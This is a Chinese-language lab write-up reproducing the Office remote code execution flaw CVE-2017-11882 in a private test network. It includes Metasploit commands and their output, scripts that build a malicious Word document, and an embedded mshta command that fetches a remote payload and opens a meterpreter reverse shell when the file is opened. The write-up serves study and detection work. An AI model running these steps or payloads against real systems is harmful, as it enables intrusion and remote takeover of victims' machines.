CVE-2017-11882 Office远程代码执行漏洞复现

CVE-2017-11882 Office远程代码执行漏洞及一点思考

0x01 概述

作为上一代office通杀漏洞,CVE-2017-11882是典型的具有APT危害漏洞之一,常见于APT检测样本中,其曾经潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。CVE-2017-11882 通杀office2003到2016的所有版本。这里通过本次实验将让大家了解到其利用全过程,更好的推动相关安防工作。

影响版本: Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016

0x02 实践

根据已有的资料,发现可用的检测方式主要两种可以尝试的思路,MSF模块以及大佬们写的一些工具

第一种:使用MSF模块office_ms17_11882

  • 环境搭建 测试目标:office 2013、office2010、office2007 靶机:win2008 攻击:kali2 测试环境环境:

    1. kali: 192.168.1.128
    2. win2008(x64):192.168.1.100
    3. office2013 64位专业版 microsoft word 2013(15.0.4569.1504) MSO(15.0.4569.1506) 64位 office2010 64位专业版 microsoft office professional plus 2010(14.0.6023.1000)64位
    4. 实验工具: exploit/windows/fileformat/office_ms17_11882

  • 操作步骤: 参考:https://www.jianshu.com/p/6f5e23cbbe70

  1. msf>use exploit/windows/fileformat/office_ms17_11882

  2. 设置监听主机 msf>set lhost 192.168.1.128

  3. 设置uripath msf>set uripath 111.doc

    msf exploit(office_ms17_11882) > show options

Module options (exploit/windows/fileformat/office_ms17_11882):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME    msf.rtf            yes       Filename to save as
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   111.doc          no        The URI to use for this exploit (default is random)

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

  4. run

    msf exploit(office_ms17_11882) > exploit
[*] Using URL: http://0.0.0.0:8080/111.doc
[*] Local IP: http://127.0.0.1:8080/111.doc
[*] Server started.
[+] msf.,rtf stored at /root/.msf4/local/msf.rtf

  5. 在受害者机器打开文件 1564991301943 1564991301943 office 13失败 1565017971685 1565017971685 office 2007失败 msf接收反弹失败:

    msf>
......
[*] Delivering payload to 192.168.1.105 ...
[*] Delivering payload to 192.168.1.105 ...
[*] Delivering payload to 192.168.1.105 ...
第二种:使用独立脚本方式

这里使用到的工具有: https://github.com/Ridter/CVE-2017-11882/ https://github.com/starnightcyber/CVE-2017-11882 参考文章:https://www.cnblogs.com/Hi-blog/p/7878054.html

首先测试漏洞情况:用到https://github.com/Ridter/CVE-2017-11882/ 里面的脚本

>python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve-2017-11882.doc

[*] Done ! output file --> cve-2017-11882.doc

测试弹窗rtf 1564132637307 1564132637307 office2010触发 1564467101483 1564467101483 office2013触发 漏洞存在,那么下一步尝试进一步利用。 这里用到https://github.com/starnightcyber/CVE-2017-11882 里面的msf脚本。 将脚本PS_shell.rb放到metasploit exploit的某个路径下:

mkdir /usr/share/metasploit-framework/modules/exploits/windows/new-exp&&mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/new-exps

进入msf利用:

msf> use exploit/windows/new-exp/PS_shell
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf exploit(PS_shell) > set uripath exp
uripath => exp1711882
msf exploit(PS_shell) > show options

Module options (exploit/windows/new-exp/PS_shell):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  exp              no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(PS_shell) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/exp
[*] Local IP: http://127.0.0.1:8080/exp
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.128:8080/exp"

接着需要使用脚本生成上面语句的exp文件

python Command_CVE-2017-11882.py  -c  "mshta.exe http://192.168.1.128:8080/exp " -o exp_recon3.doc
[*] Done ! output file >> exp_recon3.doc <<

这里发现该脚本不能输入超过43字符,所以在输出命令时候要配合调整uripath路径。

发给受害者点击,成功,meterpreter up。

0x03 总结

综上可以看到,msf自带方式未能在本次实验中利用成功,通常的利用方式应该仅仅通过各位研究员的脚本来执行。

0x04 进一步研究方向推荐

为了方便同学们进一步学习研究,这里提供一些后续的研究思路供大家拓展:

  1. 可从代码角度,通过对office角度进行探查,分析原理,尤其遇到的脚本长度限制和msf未能成功问题
  2. 配合漏洞的一些现实案例和社工案例的汇总及分析
  3. 从监测检测角度思考的话,如何发现和对抗发现进一步优化

0x05 一些参考

https://www.jianshu.com/p/b6bc1ba0c997 https://www.cnblogs.com/Hi-blog/p/7878054.html https://www.cnblogs.com/pshell/p/7875416.html https://github.com/embedi/CVE-2017-11882 https://github.com/starnightcyber/CVE-2017-11882 https://github.com/Ridter/CVE-2017-11882/ 官方补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882